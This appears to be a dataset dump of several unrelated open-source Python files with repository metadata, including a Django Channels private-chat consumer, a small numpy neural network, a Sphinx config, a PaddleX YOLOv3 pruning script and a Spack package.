with self.Dummy(value=(1,2)) as (a1, a2), \
self.Dummy(value=(10, 20)) as (b1, b2):
self.assertEqual(1, a1)
self.assertEqual(2, a2)
self.assertEqual(10, b1)
self.assertEqual(20, b2)
def test_main():
run_unittest(FailureTestCase, NonexceptionalTestCase,
NestedNonexceptionalTestCase, ExceptionalTestCase,
NonLocalFlowControlTestCase,
AssignmentTargetTestCase,
ExitSwallowsExceptionTestCase,
NestedWith)
if __name__ == '__main__':
test_main()
| 35.108725
| 111
| 0.634654
|
49fef3ca3a8f71bcfc39eb745e50315bc15dff81
| 11,149
|
py
|
Python
|
chat/consumers.py
|
SelinJodhani/Open-Chat
|
ee9513d9efa39a2048525f76c605ddb8668b1580
|
[
"MIT"
] | null | null | null |
chat/consumers.py
|
SelinJodhani/Open-Chat
|
ee9513d9efa39a2048525f76c605ddb8668b1580
|
[
"MIT"
] | null | null | null |
chat/consumers.py
|
SelinJodhani/Open-Chat
|
ee9513d9efa39a2048525f76c605ddb8668b1580
|
[
"MIT"
] | null | null | null |
from channels.generic.websocket import AsyncJsonWebsocketConsumer
from channels.db import database_sync_to_async
from django.core.serializers import serialize
from django.utils import timezone
from django.core.paginator import Paginator
import json
import asyncio
from chat.models import RoomChatMessage, PrivateChatRoom, UnreadChatRoomMessages
from friend.models import FriendList
from account.utils import LazyAccountEncoder
from chat.utils import calculate_timestamp, LazyRoomChatMessageEncoder
from chat.exceptions import ClientError
from chat.constants import *
from account.models import Account
class ChatConsumer(AsyncJsonWebsocketConsumer):
async def connect(self):
"""
Called when the websocket is handshaking as part of initial connection.
"""
print("ChatConsumer: connect: " + str(self.scope["user"]))
# let everyone connect. But limit read/write to authenticated users
await self.accept()
# the room_id will define what it means to be "connected". If it is not None, then the user is connected.
self.room_id = None
async def receive_json(self, content):
"""
Called when we get a text frame. Channels will JSON-decode the payload
for us and pass it as the first argument.
"""
# Messages will have a "command" key we can switch on
print("ChatConsumer: receive_json")
command = content.get("command", None)
try:
if command == "join":
print("joining room: " + str(content['room_id']))
await self.join_room(content["room_id"])
elif command == "leave":
# Leave the room
await self.leave_room(content["room_id"])
elif command == "send":
if len(content["message"].lstrip()) == 0:
raise ClientError(422,"You can't send an empty message.")
await self.send_room(content["room_id"], content["message"])
elif command == "get_room_chat_messages":
await self.display_progress_bar(True)
room = await get_room_or_error(content['room_id'], self.scope["user"])
payload = await get_room_chat_messages(room, content['page_number'])
if payload is not None:
payload = json.loads(payload)
await self.send_messages_payload(payload['messages'], payload['new_page_number'])
else:
raise ClientError(204,"Something went wrong retrieving the chatroom messages.")
await self.display_progress_bar(False)
elif command == "get_user_info":
await self.display_progress_bar(True)
room = await get_room_or_error(content['room_id'], self.scope["user"])
payload = get_user_info(room, self.scope["user"])
if payload is not None:
payload = json.loads(payload)
await self.send_user_info_payload(payload['user_info'])
else:
raise ClientError(204, "Something went wrong retrieving the other user's account details.")
await self.display_progress_bar(False)
except ClientError as e:
await self.handle_client_error(e)
async def disconnect(self, code):
"""
Called when the WebSocket closes for any reason.
"""
# Leave the room
print("ChatConsumer: disconnect")
try:
if self.room_id is not None:
await self.leave_room(self.room_id)
except Exception as e:
print("EXCEPTION: " + str(e))
pass
async def join_room(self, room_id):
"""
Called by receive_json when someone sent a join command.
"""
# The logged-in user is in our scope thanks to the authentication ASGI middleware (AuthMiddlewareStack)
print("ChatConsumer: join_room: " + str(room_id))
try:
room = await get_room_or_error(room_id, self.scope["user"])
except ClientError as e:
return await self.handle_client_error(e)
# Add user to "users" list for room
await connect_user(room, self.scope["user"])
# Store that we're in the room
self.room_id = room.id
await on_user_connected(room, self.scope["user"])
# Add them to the group so they get room messages
await self.channel_layer.group_add(
room.group_name,
self.channel_name,
)
# Instruct their client to finish opening the room
await self.send_json({
"join": str(room.id),
})
async def leave_room(self, room_id):
"""
Called by receive_json when someone sent a leave command.
"""
# The logged-in user is in our scope thanks to the authentication ASGI middleware
print("ChatConsumer: leave_room")
room = await get_room_or_error(room_id, self.scope["user"])
# Remove user from "connected_users" list
await disconnect_user(room, self.scope["user"])
# Remove that we're in the room
self.room_id = None
# Remove them from the group so they no longer get room messages
await self.channel_layer.group_discard(
room.group_name,
self.channel_name,
)
# Instruct their client to finish closing the room
await self.send_json({
"leave": str(room.id),
})
async def send_room(self, room_id, message):
"""
Called by receive_json when someone sends a message to a room.
"""
print("ChatConsumer: send_room")
# Check they are in this room
if self.room_id is not None:
if str(room_id) != str(self.room_id):
print("CLIENT ERRROR 1")
raise ClientError("ROOM_ACCESS_DENIED", "Room access denied")
else:
print("CLIENT ERRROR 2")
raise ClientError("ROOM_ACCESS_DENIED", "Room access denied")
# Get the room and send to the group about it
room = await get_room_or_error(room_id, self.scope["user"])
# get list of connected_users
connected_users = room.connected_users.all()
# Execute these functions asynchronously
await asyncio.gather(*[
append_unread_msg_if_not_connected(room, room.user1, connected_users, message),
append_unread_msg_if_not_connected(room, room.user2, connected_users, message),
create_room_chat_message(room, self.scope["user"], message)
])
await self.channel_layer.group_send(
room.group_name,
{
"type": "chat.message",
"profile_image": self.scope["user"].profile_image.url,
"username": self.scope["user"].username,
"user_id": self.scope["user"].id,
"message": message,
}
)
async def chat_message(self, event):
"""
Called when someone has messaged our chat.
"""
# Send a message down to the client
print("ChatConsumer: chat_message")
timestamp = calculate_timestamp(timezone.now())
await self.send_json(
{
"msg_type": MSG_TYPE_MESSAGE,
"username": event["username"],
"user_id": event["user_id"],
"profile_image": event["profile_image"],
"message": event["message"],
"natural_timestamp": timestamp,
},
)
async def send_messages_payload(self, messages, new_page_number):
"""
Send a payload of messages to the ui
"""
print("ChatConsumer: send_messages_payload. ")
await self.send_json(
{
"messages_payload": "messages_payload",
"messages": messages,
"new_page_number": new_page_number,
},
)
async def send_user_info_payload(self, user_info):
"""
Send a payload of user information to the ui
"""
print("ChatConsumer: send_user_info_payload. ")
await self.send_json(
{
"user_info": user_info,
},
)
async def display_progress_bar(self, is_displayed):
"""
1. is_displayed = True
- Display the progress bar on UI
2. is_displayed = False
- Hide the progress bar on UI
"""
print("DISPLAY PROGRESS BAR: " + str(is_displayed))
await self.send_json(
{
"display_progress_bar": is_displayed
}
)
async def handle_client_error(self, e):
"""
Called when a ClientError is raised.
Sends error data to UI.
"""
errorData = {}
errorData['error'] = e.code
if e.message:
errorData['message'] = e.message
await self.send_json(errorData)
return
@database_sync_to_async
def get_room_or_error(room_id, user):
"""
Tries to fetch a room for the user, checking permissions along the way.
"""
try:
room = PrivateChatRoom.objects.get(pk=room_id)
except PrivateChatRoom.DoesNotExist:
raise ClientError("ROOM_INVALID", "Invalid room.")
# Is this user allowed in the room? (must be user1 or user2)
if user != room.user1 and user != room.user2:
raise ClientError("ROOM_ACCESS_DENIED", "You do not have permission to join this room.")
# Are the users in this room friends?
friend_list = FriendList.objects.get(user=user).friends.all()
if room.user1 not in friend_list and room.user2 not in friend_list:
raise ClientError("ROOM_ACCESS_DENIED", "You must be friends to chat.")
return room
# I don't think this requires @database_sync_to_async since we are just accessing a model field
# https://docs.djangoproject.com/en/3.1/ref/models/instances/#refreshing-objects-from-database
def get_user_info(room, user):
"""
Retrieve the user info for the user you are chatting with
"""
try:
# Determine who is who
other_user = room.user1
if other_user == user:
other_user = room.user2
payload = {}
s = LazyAccountEncoder()
# convert to list for serializer and select first entry (there will be only 1)
payload['user_info'] = s.serialize([other_user])[0]
return json.dumps(payload)
except ClientError as e:
raise ClientError("DATA_ERROR", "Unable to get that users information.")
return None
@database_sync_to_async
def create_room_chat_message(room, user, message):
return RoomChatMessage.objects.create(user=user, room=room, content=message)
@database_sync_to_async
def get_room_chat_messages(room, page_number):
try:
qs = RoomChatMessage.objects.by_room(room)
p = Paginator(qs, DEFAULT_ROOM_CHAT_MESSAGE_PAGE_SIZE)
payload = {}
messages_data = None
new_page_number = int(page_number)
if new_page_number <= p.num_pages:
new_page_number = new_page_number + 1
s = LazyRoomChatMessageEncoder()
payload['messages'] = s.serialize(p.page(page_number).object_list)
else:
payload['messages'] = "None"
payload['new_page_number'] = new_page_number
return json.dumps(payload)
except Exception as e:
print("EXCEPTION: " + str(e))
return None
@database_sync_to_async
def connect_user(room, user):
# add user to connected_users list
account = Account.objects.get(pk=user.id)
return room.connect_user(account)
@database_sync_to_async
def disconnect_user(room, user):
# remove from connected_users list
account = Account.objects.get(pk=user.id)
return room.disconnect_user(account)
# If the user is not connected to the chat, increment "unread messages" count
@database_sync_to_async
def append_unread_msg_if_not_connected(room, user, connected_users, message):
if user not in connected_users:
try:
unread_msgs = UnreadChatRoomMessages.objects.get(room=room, user=user)
unread_msgs.most_recent_message = message
unread_msgs.count += 1
unread_msgs.save()
except UnreadChatRoomMessages.DoesNotExist:
UnreadChatRoomMessages(room=room, user=user, count=1).save()
pass
return
# When a user connects, reset their unread message count
@database_sync_to_async
def on_user_connected(room, user):
# confirm they are in the connected users list
connected_users = room.connected_users.all()
if user in connected_users:
try:
# reset count
unread_msgs = UnreadChatRoomMessages.objects.get(room=room, user=user)
unread_msgs.count = 0
unread_msgs.save()
except UnreadChatRoomMessages.DoesNotExist:
UnreadChatRoomMessages(room=room, user=user).save()
pass
return
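# A hedged reference sketch of the client-side protocol: receive_json above
# dispatches on a "command" key, so a websocket client is expected to send JSON
# frames shaped like the dictionaries below. The room id, page number and
# message text are placeholder values, not taken from the original code.
EXAMPLE_CLIENT_COMMANDS = [
    {"command": "join", "room_id": 1},
    {"command": "send", "room_id": 1, "message": "hello"},
    {"command": "get_room_chat_messages", "room_id": 1, "page_number": 1},
    {"command": "get_user_info", "room_id": 1},
    {"command": "leave", "room_id": 1},
]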
| 30.545205
| 107
| 0.729482
|
45c577c80f77e848eb30eed18a7ed4b3baf008e2
| 7,181
|
py
|
Python
|
programming_assignments/3_Neural-Networks/nn.py
|
biqar/Fall-2020-ITCS-8156-MachineLearning
|
ce14609327e5fa13f7af7b904a69da3aa3606f37
|
[
"MIT"
] | null | null | null |
programming_assignments/3_Neural-Networks/nn.py
|
biqar/Fall-2020-ITCS-8156-MachineLearning
|
ce14609327e5fa13f7af7b904a69da3aa3606f37
|
[
"MIT"
] | null | null | null |
programming_assignments/3_Neural-Networks/nn.py
|
biqar/Fall-2020-ITCS-8156-MachineLearning
|
ce14609327e5fa13f7af7b904a69da3aa3606f37
|
[
"MIT"
] | null | null | null |
""" Neural Network
referenced NN code by Chuck Anderson in R and C++
by Jake Lee (lemin)
example usage:
X = numpy.array([0,0,1,0,0,1,1,1]).reshape(4,2)
T = numpy.array([0,1,1,0,1,0,0,1]).reshape(4,2)
nn = nnet.NeuralNet([2,3,2])
nn.train(X,T, wprecision=1e-20, fprecision=1e-2)
Y = nn.use(X)
"""
import numpy as np
import matplotlib.pyplot as plt
from grad import scg, steepest
from copy import copy
from util import Standardizer
class NeuralNet:
""" neural network class for regression
Parameters
----------
nunits: list
the number of inputs, hidden units, and outputs
Methods
-------
set_hunit
update/initialize weights
pack
pack multiple weights of each layer into one vector
forward
forward processing of neural network
backward
back-propagation of neural network
train
train the neural network
use
apply the trained network for prediction
Attributes
----------
_nLayers
the number of hidden unit layers
rho
learning rate
_W
weights
_weights
weights in one dimension (_W is referencing _weight)
stdX
standardization class for data
stdT
standardization class for target
Notes
-----
"""
def __init__(self, nunits):
self._nLayers=len(nunits)-1
self.rho = [1] * self._nLayers
self._W = []
wdims = []
lenweights = 0
for i in range(self._nLayers):
nwr = nunits[i] + 1
nwc = nunits[i+1]
wdims.append((nwr, nwc))
lenweights = lenweights + nwr * nwc
self._weights = np.random.uniform(-0.1,0.1, lenweights)
start = 0 # fixed index error 20110107
for i in range(self._nLayers):
end = start + wdims[i][0] * wdims[i][1]
# use reshape rather than resize so _W[i] stays a view into self._weights
self._W.append(self._weights[start:end].reshape(wdims[i]))
start = end
self.stdX = None
self.stdT = None
self.stdTarget = True
def add_ones(self, w):
return np.hstack((np.ones((w.shape[0], 1)), w))
def get_nlayers(self):
return self._nLayers
def set_hunit(self, w):
for i in range(self._nLayers-1):
if w[i].shape != self._W[i].shape:
print("set_hunit: shapes do not match!")
break
else:
self._W[i][:] = w[i][:]
def pack(self, w):
return np.hstack(map(np.ravel, w))
def unpack(self, weights):
self._weights[:] = weights[:] # unpack
def cp_weight(self):
return copy(self._weights)
def RBF(self, X, m=None,s=None):
if m is None: m = np.mean(X)
if s is None: s = 2 #np.std(X)
r = 1. / (np.sqrt(2*np.pi)* s)
return r * np.exp(-(X - m) ** 2 / (2 * s ** 2))
def forward(self,X):
t = X
Z = []
for i in range(self._nLayers):
Z.append(t)
if i == self._nLayers - 1:
t = np.dot(self.add_ones(t), self._W[i])
else:
t = np.tanh(np.dot(self.add_ones(t), self._W[i]))
#t = self.RBF(np.dot(np.hstack((np.ones((t.shape[0],1)),t)),self._W[i]))
return (t, Z)
def backward(self, error, Z, T, lmb=0):
delta = error
N = T.size
dws = []
for i in range(self._nLayers - 1, -1, -1):
rh = float(self.rho[i]) / N
if i==0:
lmbterm = 0
else:
lmbterm = lmb * np.vstack((np.zeros((1, self._W[i].shape[1])),
self._W[i][1:,]))
dws.insert(0,(-rh * np.dot(self.add_ones(Z[i]).T, delta) + lmbterm))
if i != 0:
delta = np.dot(delta, self._W[i][1:, :].T) * (1 - Z[i]**2)
return self.pack(dws)
def _errorf(self, T, Y):
return T - Y
def _objectf(self, T, Y, wpenalty):
return 0.5 * np.mean(np.square(T - Y)) + wpenalty
def train(self, X, T, **params):
verbose = params.pop('verbose', False)
# training parameters
_lambda = params.pop('Lambda', 0.)
#parameters for scg
niter = params.pop('niter', 1000)
wprecision = params.pop('wprecision', 1e-10)
fprecision = params.pop('fprecision', 1e-10)
wtracep = params.pop('wtracep', False)
ftracep = params.pop('ftracep', False)
# optimization
optim = params.pop('optim', 'scg')
if self.stdX is None:
explore = params.pop('explore', False)
self.stdX = Standardizer(X, explore)
Xs = self.stdX.standardize(X)
if self.stdT is None and self.stdTarget:
self.stdT = Standardizer(T)
T = self.stdT.standardize(T)
def gradientf(weights):
self.unpack(weights)
Y,Z = self.forward(Xs)
error = self._errorf(T, Y)
return self.backward(error, Z, T, _lambda)
def optimtargetf(weights):
""" optimization target function : MSE
"""
self.unpack(weights)
#self._weights[:] = weights[:] # unpack
Y,_ = self.forward(Xs)
Wnb=np.array([])
for i in range(self._nLayers):
if len(Wnb)==0: Wnb=self._W[i][1:,].reshape(self._W[i].size-self._W[i][0,].size,1)
else: Wnb = np.vstack((Wnb,self._W[i][1:,].reshape(self._W[i].size-self._W[i][0,].size,1)))
wpenalty = _lambda * np.dot(Wnb.flat ,Wnb.flat)
return self._objectf(T, Y, wpenalty)
if optim == 'scg':
result = scg(self.cp_weight(), gradientf, optimtargetf,
wPrecision=wprecision, fPrecision=fprecision,
nIterations=niter,
wtracep=wtracep, ftracep=ftracep,
verbose=False)
self.unpack(result['w'][:])
self.f = result['f']
elif optim == 'steepest':
result = steepest(self.cp_weight(), gradientf, optimtargetf,
nIterations=niter,
xPrecision=wprecision, fPrecision=fprecision,
xtracep=wtracep, ftracep=ftracep )
self.unpack(result['w'][:])
if ftracep:
self.ftrace = result['ftrace']
if 'reason' in result.keys() and verbose:
print(result['reason'])
return result
def use(self, X, retZ=False):
if self.stdX:
Xs = self.stdX.standardize(X)
else:
Xs = X
Y, Z = self.forward(Xs)
if self.stdT is not None:
Y = self.stdT.unstandardize(Y)
if retZ:
return Y, Z
return Y
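# A minimal training sketch, mirroring the XOR example in the module docstring
# and exercising the keyword arguments consumed by train() above (niter, Lambda,
# optim, verbose). The network size and iteration count are arbitrary choices.
if __name__ == "__main__":
    X = np.array([0, 0, 1, 0, 0, 1, 1, 1]).reshape(4, 2)
    T = np.array([0, 1, 1, 0, 1, 0, 0, 1]).reshape(4, 2)
    net = NeuralNet([2, 3, 2])
    net.train(X, T, niter=500, Lambda=0.0, optim='scg', verbose=True)
    print(net.use(X))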
| 29.920833
| 107
| 0.493246
|
a91c08d178195ea7cf3ccb8406aa95166a8124f0
| 4,868
|
py
|
Python
|
docs/conf.py
|
renan-eccel/sillysort
|
98531bb011f220d0877ba2abfd202d52026a2695
|
[
"MIT"
] | null | null | null |
docs/conf.py
|
renan-eccel/sillysort
|
98531bb011f220d0877ba2abfd202d52026a2695
|
[
"MIT"
] | 310
|
2018-05-14T01:32:25.000Z
|
2022-03-28T06:34:20.000Z
|
docs/conf.py
|
renan-eccel/sillysort
|
98531bb011f220d0877ba2abfd202d52026a2695
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# sillysort documentation build configuration file, created by
# sphinx-quickstart on Fri Jun 9 13:47:02 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
import sillysort
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'SillySort'
copyright = u"2018, Renan Artur Lopes Eccel"
author = u"Renan Artur Lopes Eccel"
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = sillysort.__version__
# The full version, including alpha/beta/rc tags.
release = sillysort.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ---------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'sillysortdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto, manual, or own class]).
latex_documents = [
(master_doc, 'sillysort.tex',
u'SillySort Documentation',
u'Renan Artur Lopes Eccel', 'manual'),
]
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'sillysort',
u'SillySort Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'sillysort',
u'SillySort Documentation',
author,
'sillysort',
'One line description of project.',
'Miscellaneous'),
]
| 29.682927
| 77
| 0.685703
|
bb87615f8d4d4dc3de0700618449530b827e68ee
| 1,036
|
py
|
Python
|
servers/pso/pyEUROPA/pyEUROPA/interface/enviroment.py
|
arpitgogia/mars_city
|
30cacd80487a8c2354bbc15b4fad211ed1cb4f9d
|
[
"BSD-2-Clause-FreeBSD"
] | 25
|
2016-07-20T04:49:14.000Z
|
2021-08-25T09:05:04.000Z
|
servers/pso/pyEUROPA/pyEUROPA/interface/enviroment.py
|
arpitgogia/mars_city
|
30cacd80487a8c2354bbc15b4fad211ed1cb4f9d
|
[
"BSD-2-Clause-FreeBSD"
] | 16
|
2016-12-27T08:30:27.000Z
|
2018-06-18T08:51:44.000Z
|
servers/pso/pyEUROPA/pyEUROPA/interface/enviroment.py
|
arpitgogia/mars_city
|
30cacd80487a8c2354bbc15b4fad211ed1cb4f9d
|
[
"BSD-2-Clause-FreeBSD"
] | 49
|
2016-07-20T13:08:27.000Z
|
2020-06-02T18:26:12.000Z
|
from pyEUROPA.engine import makePSEngine, stopPSEngine
class Enviroment(object):
"""Planning environment"""
_objects = []
_locations = {}
def set_rover(self):
pass
def set_rover_goal(self):
pass
def add_location(self, name, position):
"""Locations are places of interest for the rover"""
if name in self._locations:
raise ValueError("Location already exists in environment!")
self._locations[name] = position
def remove_location(self, name):
del self._locations[name]
def get_plan(self):
pass
def go(self):
# Convert Python to EUROPA's NDDL
self._is_alive = True
self._psengine = makePSEngine()
# Load actor's initial enviroment
errors = self._psengine.executeScript("nddl", enviroment, True)
if errors != "":
raise ValueError("Failed loading initial enviroment: " + errors)
def kill(self):
self._is_alive = False
stopPSEngine(self._psengine)
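# A minimal usage sketch of the location bookkeeping above (running it still
# requires pyEUROPA to be importable). The names and coordinates are placeholder
# values; go()/kill() are left out because they additionally need a running
# EUROPA engine plus an NDDL model to load.
if __name__ == "__main__":
    env = Enviroment()
    env.add_location("base_camp", (0, 0))
    env.add_location("crater_rim", (12, 7))
    env.remove_location("crater_rim")
    print(env._locations)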
| 23.545455
| 73
| 0.627413
|
24806362bf270f58126adf6bbe7fcc2cc58189e6
| 700
|
py
|
Python
|
setup.py
|
jinhopark8345/ICC
|
be0ee8fb36399b156427749c867d64524dff786e
|
[
"MIT"
] | null | null | null |
setup.py
|
jinhopark8345/ICC
|
be0ee8fb36399b156427749c867d64524dff786e
|
[
"MIT"
] | 7
|
2020-09-28T07:17:58.000Z
|
2020-11-25T08:00:08.000Z
|
setup.py
|
jinhopark8345/icc
|
be0ee8fb36399b156427749c867d64524dff786e
|
[
"MIT"
] | null | null | null |
import os
import sys
import inspect
import platform
import threading
# ROOT_DIR = None
# def setup():
# main_id = None
# for t in threading.enumerate():
# if t.name == 'MainThread':
# main_id = t.ident
# break
# if not main_id:
# raise RuntimeError("Main thread exited before execution")
# current_main_frame = sys._current_frames()[main_id]
# base_frame = inspect.getouterframes(current_main_frame)[-1]
# if platform.system() == 'Windows':
# filename = base_frame.filename
# else:
# filename = base_frame[0].f_code.co_filename
# global ROOT_DIR
# ROOT_DIR = os.path.dirname(os.path.abspath(filename))
| 24.137931
| 67
| 0.638571
|
d0b62eb976e9048d459353edbc3c2aaaf50a47b0
| 1,579
|
py
|
Python
|
tutorials/slim/prune/object_detection/yolov3_prune_train.py
|
yaoshanliang/PaddleX
|
fe40b6d10db0e4d46f3a73cc5e83c3236d6a5842
|
[
"Apache-2.0"
] | 3,655
|
2020-03-28T09:19:50.000Z
|
2022-03-31T13:28:39.000Z
|
tutorials/slim/prune/object_detection/yolov3_prune_train.py
|
yaoshanliang/PaddleX
|
fe40b6d10db0e4d46f3a73cc5e83c3236d6a5842
|
[
"Apache-2.0"
] | 829
|
2020-03-28T04:03:18.000Z
|
2022-03-31T14:34:30.000Z
|
tutorials/slim/prune/object_detection/yolov3_prune_train.py
|
yaoshanliang/PaddleX
|
fe40b6d10db0e4d46f3a73cc5e83c3236d6a5842
|
[
"Apache-2.0"
] | 738
|
2020-03-28T03:56:46.000Z
|
2022-03-31T13:11:03.000Z
|
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from paddlex.det import transforms
import paddlex as pdx
insect_dataset = 'https://bj.bcebos.com/paddlex/datasets/insect_det.tar.gz'
pdx.utils.download_and_decompress(insect_dataset, path='./')
train_transforms = transforms.Compose([
transforms.MixupImage(mixup_epoch=250),
transforms.RandomDistort(),
transforms.RandomExpand(),
transforms.RandomCrop(),
transforms.Resize(
target_size=608, interp='RANDOM'),
transforms.RandomHorizontalFlip(),
transforms.Normalize(),
])
eval_transforms = transforms.Compose([
transforms.Resize(
target_size=608, interp='CUBIC'),
transforms.Normalize(),
])
train_dataset = pdx.datasets.VOCDetection(
data_dir='insect_det',
file_list='insect_det/train_list.txt',
label_list='insect_det/labels.txt',
transforms=train_transforms,
shuffle=True)
eval_dataset = pdx.datasets.VOCDetection(
data_dir='insect_det',
file_list='insect_det/val_list.txt',
label_list='insect_det/labels.txt',
transforms=eval_transforms)
num_classes = len(train_dataset.labels)
model = pdx.det.YOLOv3(num_classes=num_classes, backbone='MobileNetV1')
model.train(
num_epochs=270,
train_dataset=train_dataset,
train_batch_size=8,
eval_dataset=eval_dataset,
learning_rate=0.000125,
lr_decay_epochs=[210, 240],
pretrain_weights='output/yolov3_mobilenetv1/best_model',
save_dir='output/yolov3_mobilenetv1_prune',
sensitivities_file='./yolov3.sensi.data',
eval_metric_loss=0.05,
use_vdl=True)
| 28.709091
| 75
| 0.742242
|
00c0f494791c7f6e7914eb00575dfa92332d99d1
| 1,569
|
py
|
Python
|
package/spack-perl-io-html/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | 1
|
2018-07-17T07:45:09.000Z
|
2018-07-17T07:45:09.000Z
|
package/spack-perl-io-html/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
package/spack-perl-io-html/package.py
|
ctuning/ck-spack
|
307934efce1be2d4f104251275c82fbc70127105
|
[
"BSD-3-Clause"
] | null | null | null |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PerlIoHtml(PerlPackage):
"""Open an HTML file with automatic charset detection."""
homepage = "http://search.cpan.org/~cjm/IO-HTML-1.001/lib/IO/HTML.pm"
url = "http://search.cpan.org/CPAN/authors/id/C/CJ/CJM/IO-HTML-1.001.tar.gz"
version('1.001', '3f8958718844dc96b9f6946f21d70d22')
| 44.828571
| 85
| 0.67559
|
254e8fdc4209350e303b62aab677e5e6f7435c85
| 738
|
py
|
Python
|
get_align_face.py
|
WilsonWeng-hub/Python-Tensorflow-Face-v2.0
|
10ab4f031b9061bcd124f75decb31da35eb6c6c1
|
[
"Apache-2.0"
] | 117
|
2018-01-24T09:19:51.000Z
|
2022-03-27T12:43:48.000Z
|
get_align_face.py
|
WilsonWeng-hub/Python-Tensorflow-Face-v2.0
|
10ab4f031b9061bcd124f75decb31da35eb6c6c1
|
[
"Apache-2.0"
] | 5
|
2018-02-24T07:28:54.000Z
|
2020-09-15T16:20:41.000Z
|
get_align_face.py
|
WilsonWeng-hub/Python-Tensorflow-Face-v2.0
|
10ab4f031b9061bcd124f75decb31da35eb6c6c1
|
[
"Apache-2.0"
] | 48
|
2018-01-28T08:41:31.000Z
|
2021-05-11T02:07:25.000Z
|
import multiprocessing
import os
from face_lib import my_api
input_dir = './out' # input face image dataset
output_dir = './train_faces' # root output directory for the images
# create the output directory if it does not exist
if not os.path.exists(output_dir):
os.makedirs(output_dir)
if __name__ == '__main__':
get_face = my_api.GetAlignedFace(input_dir, output_dir)
# start a multiprocessing pool
pool = multiprocessing.Pool(processes=6)
photo_names = get_face.pic_names
print(photo_names)
pic_num = 0 # total number of image directories that already exist
for file_name in photo_names:
name = file_name
pool.apply_async(get_face.photo_read, (file_name, pic_num))
pic_num = pic_num + 1
pool.close()
pool.join() # close() must be called before join(), otherwise an error occurs; after close() no new tasks can be added to the pool, and join() waits for all child processes to finish
print('Done')
| 21.085714
| 84
| 0.700542
|
2e704d8c400ec9617225b82a4aacc35eed93c32b
| 6,662
|
py
|
Python
|
UMLRT2Kiltera_MM/MT_pre__TransitionType.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 3
|
2017-06-02T19:26:27.000Z
|
2021-06-14T04:25:45.000Z
|
UMLRT2Kiltera_MM/MT_pre__TransitionType.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 8
|
2016-08-24T07:04:07.000Z
|
2017-05-26T16:22:47.000Z
|
UMLRT2Kiltera_MM/MT_pre__TransitionType.py
|
levilucio/SyVOLT
|
7526ec794d21565e3efcc925a7b08ae8db27d46a
|
[
"MIT"
] | 1
|
2019-10-31T06:00:23.000Z
|
2019-10-31T06:00:23.000Z
|
"""
__MT_pre__TransitionType.py_____________________________________________________
